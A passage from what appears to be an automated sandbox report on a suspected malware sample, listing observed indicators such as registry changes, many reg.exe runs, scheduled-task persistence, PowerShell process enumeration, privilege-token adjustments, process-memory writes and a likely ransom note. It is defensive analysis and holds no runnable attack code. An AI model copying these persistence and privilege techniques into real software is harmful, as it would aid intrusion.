03a20323536207d2c205c2245786368616e67654765744d616e6966657374735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2245786368616e676552656672657368457874656e73696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2241757468656e7469636174696f6e526963684170695c22203a207b205c224576656e74735c22203a207b205c22476574416363657373546f6b656e56324261636b67726f756e645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574416363657373546f6b656e56324d61696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574416363657373546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2247657441757468546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c22496e7374616c6c65725c22203a207b205c225375624e616d657370616365735c22203a207b205c225461736b456e67696e655c22203a207b205c224576656e74735c22203a207b205c224765744368616e676564536f6c7574696f6e735461736b5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224765744368616e676564536f6c7574696f6e735461736b5265676973746572536f6c7574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744368616e676564536f6c7574696f6e735461736b52656769737465724e65757472616c5061636b6167655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b5363686564756c65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b526567697374726174696f6e4572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b537563636573735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b496e46696e616c697a655374617465457863657074696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b536574496e7374616c6c5374617475734572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b61676541707078457874726163746f725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b6167655265717565737465725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b6167655265717565737465725461736b53657276696365526571756573745374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b446573747275637465644265666f7265436f6d706c6574655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b436f6d706c6574656446657463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b496e7374616c6c6564417070735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22457870466972737453657373696f6e5461736b4170704665746368446f6e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b61676553617665725461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578705061636b616765526567697374726174696f6e496e666f5461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225061636b616765536f6c7574696f6e49445570646174655461736b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578747261637446696c6573546573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2245787472616374466f6f747072696e7446696c6573546573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e7374616c6c536478536f6c7574696f6e5461736b52756e4e657874457863657074696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f73664d616e69666573 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|2" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|10" OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.15 = 6861726555726c466f72436f6e7461696e65724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22476574536861726555726c466f7246696c654173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22476574576f706955726c46726f6d46696c654964656e7469666965724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2249446f63756d656e7447657456657273696f6e4c6973745c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2249446f63756d656e74526573746f72654173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224973446f776e6c6f616465644261736556616c69644e6f48617368436865636b5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253796e634261636b65645265636f6e63696c65725472795265636f6e63696c65546f4c6174657374416674657256657273696f6e4e6f74466f756e645c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253796e634261636b65645265636f6e63696c65725472616e736974696f6e4f6e6c696e655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2254727944657374726f794f666669636546696c6543616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22576f706942726f77736542726f777365546f436f6e7461696e65724173796e635c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f70746963735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373446f776e6c6f61644572726f72446973747269627574696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373446f776e6c6f61644572726f72446973747269627574696f6e7337446179735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f70746963734572726f72735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637346696c6553746f726546696c6553697a65446973747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637355706c6f61644572726f72446973747269627574696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637355706c6f61644572726f72446973747269627574696f6e7337446179735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f7074696373576f726b696e67436f707946696c6553697a65446973747269627574696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2252656d6f766546696c65456e7472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368654f707469637350657246696c655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2253746172744f666669636546696c6543616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d2c205c225375624e616d657370616365735c22203a207b205c2243656e7472616c5461626c655c22203a207b205c224576656e74735c22203a207b205c22436865636b536368656d6156657273696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22436c65617243616368655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22437265617465446174616261736546696c655573696e6754656d706c6174655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2243726561746544617461536f757263654661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2244617461736f757263654f70656e4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2246696c65436163686550726f70657274696573526f774e6f74466f756e645c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d69677261746546696c654e616d6546726f6d496e695c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22526f77736574556e6b6e6f776e4661696c7572655c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22536368656d61557067726164655c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224661756c744d616e6167656d656e745c22203a207b205c224576656e74735c22203a207b205c224661756c745265636f766572795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224661756c745265706f72745c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d2c205c224d534f5c22203a207b205c224576656e74735c22203a207b205c2246696c6552657061697250726f746563746564446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f4f4c446f634e657744657374727563746f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f63616c446f63756d656e74496e666f557073656c6c4576656e745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f63616c446f63756d656e74496e666f466c796f757444726f707065645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2248616e646c65417574684661696c7572655f5573654578697374696e6743726564735f47656e657269634661696c7572655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f4f4c446f6342617365476574504b4d436c69656e7445785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f536572766572496e666f476574536572766572496e666f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745265636f766572794872476574447270436f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745265636f766572794d736f4872426567696e4d6f646966794472705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225469746c654261725361766555694d616e616765725772697465537461747573546f5469746c654261725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164437369446c6c466f72436c69636b3252756e456e7669726f6e6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2249735365727665724361636865645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d616e75616c5361766555736167655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c225254435c22203a207b205c224576656e74735c22203a207b205c2246696e6453657373696f6e456e64706f696e7452756e5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2250726f746f636f6c5061727365725c22203a207b205c224576656e74735c22203a207b205c22464c6f6164436d644c696e65436f72655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e74536861726555726c5c22203a207b205c224576656e74735c22203a207b205c22556e7061636b536861726555726c416e6448616e646c65526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e556e7061636b55726c436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22556e7061636b4c696e6b5c22203a207b205c224576656e74735c22203a207b205c22556e7061636b4c696e6b5769746848696e745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486c696e6b5c22203a207b205c224576656e74735c22203a207b205c224d736f4872486c696e6b43726561746546726f6d537472696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c6553746f72655c22203a207b205c224576656e74735c22203a207b205c22465344436f7272757074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2247617262616765436f6c6c656374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225a65726f4279746546696c6555706c6f6164417474656d707465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2252756e74696d6550726f706572746965735c22203a207b205c224576656e74735c22203a207b205c22496e636f6d70617469626c6543736956657273696f6e44657465637465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224f66666963655c22203a207b205c225375624e616d657370616365735c22203a207b205c2246696c65494f5c22203a207b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f707469637356325c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6f6373695c22203a207b205c224576656e74735c22203a207b205c22557064617465486f73745469705c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e466c6f6f6467617465222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22436c69656e74436f72655c22203a207b205c225375624e616d657370616365735c22203a207b205c22426f6e6469446573657269616c697a6174696f6e5c22203a207b205c224576656e74735c22203a207b205c2246726f6d5375727665795061796c6f616442696e6172795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4772617068696373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22415243457863657074696f6e53636f70655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2245326f5669657752656e646572506572666f726d616e636541637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224172745669657756616c69646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f6669745368617065546f54657874436d645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f704c6576656c456666656374447261775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654269746d617046726f6d506c6174666f726d4269746d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e6b496e70757453757266616365426173655570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e53696d706c65506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224776697a536d61727441727450726f7065727469657354656c656d657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746544657669636544334431305c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22537065637472655472616e73636f646541637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e73657274496e646976696475616c4d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61646564496d61676550726f706572746965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e736572744d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22537065637472654372656174655363656e6541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d6f64656c334452656e64657241637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4964656e74697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c2247657446656465726174696f6e50726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656465726174696f6e50726f7669646572466f72456d61696c416464726573735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e466f7246656465726174696f6e50726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224973476c6f62616c46505c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2249734572726f7246505c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22417265457175616c46505c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6e654175746846656465726174696f6e496e666f536e617073686f745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22456e7375726550726f7669646572496e697465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574506572736f6e50726f66696c6553657475705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224964656e74697479536e617073686f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f7669646572466f7241757468536368656d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794964656e74697479506172656e744d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526f616d696e6750726f7879496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564437265645265667265736846726f6d53746f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561644f6e6546726f6d43726564656e7469616c4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22435265616453796e635461736b52756e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6d61696e4a6f696e65644f72436c6f7564446f6d61696e4a6f696e656453657373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744164616c416363657373546f6b656e46726f6d4372656450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574426c6f636b696e67536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f70756c617465536572766963654d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657441757468656e74696361746564536572766963655469636b65745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526566726573684964656e7469746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f7669646572416e616c797369735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365727669636555726c5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637175697265536572766963655469636b6574466f724144414c5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2253697465735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e496e736967687473222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243616368 OfficeClickToRun.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings myprograme.exe -
Modifies registry key 1 TTPs 56 IoCs
pid Process 816 reg.exe 544 reg.exe 2024 reg.exe 5076 reg.exe 5060 reg.exe 1640 reg.exe 4360 reg.exe 1640 reg.exe 1952 reg.exe 4704 reg.exe 2960 reg.exe 4408 reg.exe 4856 reg.exe 980 reg.exe 844 reg.exe 3984 reg.exe 2884 reg.exe 892 reg.exe 4684 reg.exe 3896 reg.exe 2140 reg.exe 3432 reg.exe 3384 reg.exe 3280 reg.exe 1952 reg.exe 400 reg.exe 4844 reg.exe 2272 reg.exe 1452 reg.exe 3472 reg.exe 4548 reg.exe 3544 reg.exe 1044 reg.exe 2320 reg.exe 2636 reg.exe 5084 reg.exe 3960 reg.exe 2708 reg.exe 780 reg.exe 996 reg.exe 4360 reg.exe 468 reg.exe 5064 reg.exe 3984 reg.exe 892 reg.exe 2732 reg.exe 2320 reg.exe 3592 reg.exe 5076 reg.exe 3004 reg.exe 3960 reg.exe 996 reg.exe 4036 reg.exe 3280 reg.exe 3896 reg.exe 4388 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2736 NOTEPAD.EXE -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4040 schtasks.exe 4836 schtasks.exe 3424 schtasks.exe 3880 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe 4468 powershell.exe 4468 powershell.exe 4468 powershell.exe 1648 powershell.exe 1648 powershell.exe 1648 powershell.exe 2736 powershell.exe 2736 powershell.exe 2736 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 3468 powershell.exe 3468 powershell.exe 3468 powershell.exe 1516 powershell.exe 1516 powershell.exe 1516 powershell.exe 4704 powershell.exe 4704 powershell.exe 4704 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe 4036 powershell.exe 4036 powershell.exe 4036 powershell.exe 4856 powershell.exe 4856 powershell.exe 4856 powershell.exe 5800 powershell.exe 5800 powershell.exe 5800 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeRestorePrivilege 2864 7zG.exe Token: 35 2864 7zG.exe Token: SeSecurityPrivilege 2864 7zG.exe Token: SeSecurityPrivilege 2864 7zG.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeIncreaseQuotaPrivilege 4996 WMIC.exe Token: SeSecurityPrivilege 4996 WMIC.exe Token: SeTakeOwnershipPrivilege 4996 WMIC.exe Token: SeLoadDriverPrivilege 4996 WMIC.exe Token: SeSystemProfilePrivilege 4996 WMIC.exe Token: SeSystemtimePrivilege 4996 WMIC.exe Token: SeProfSingleProcessPrivilege 4996 WMIC.exe Token: SeIncBasePriorityPrivilege 4996 WMIC.exe Token: SeCreatePagefilePrivilege 4996 WMIC.exe Token: SeBackupPrivilege 4996 WMIC.exe Token: SeRestorePrivilege 4996 WMIC.exe Token: SeShutdownPrivilege 4996 WMIC.exe Token: SeDebugPrivilege 4996 WMIC.exe Token: SeSystemEnvironmentPrivilege 4996 WMIC.exe Token: SeRemoteShutdownPrivilege 4996 WMIC.exe Token: SeUndockPrivilege 4996 WMIC.exe Token: SeManageVolumePrivilege 4996 WMIC.exe Token: 33 4996 WMIC.exe Token: 34 4996 WMIC.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 2864 7zG.exe 116 setup.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 5996 OfficeC2RClient.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 4152 Csetup.exe 2220 Integrator.exe 2220 Integrator.exe 1648 setup.exe 116 setup.exe 116 setup.exe 5232 OfficeClickToRun.exe 5232 OfficeClickToRun.exe 5588 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 6004 OfficeClickToRun.exe 5996 OfficeC2RClient.exe 5996 OfficeC2RClient.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3928 wrote to memory of 2232 3928 chrome.exe 83 PID 3928 wrote to memory of 2232 3928 chrome.exe 83 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 1332 3928 chrome.exe 84 PID 3928 wrote to memory of 4736 3928 chrome.exe 85 PID 3928 wrote to memory of 4736 3928 chrome.exe 85 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 PID 3928 wrote to memory of 2452 3928 chrome.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
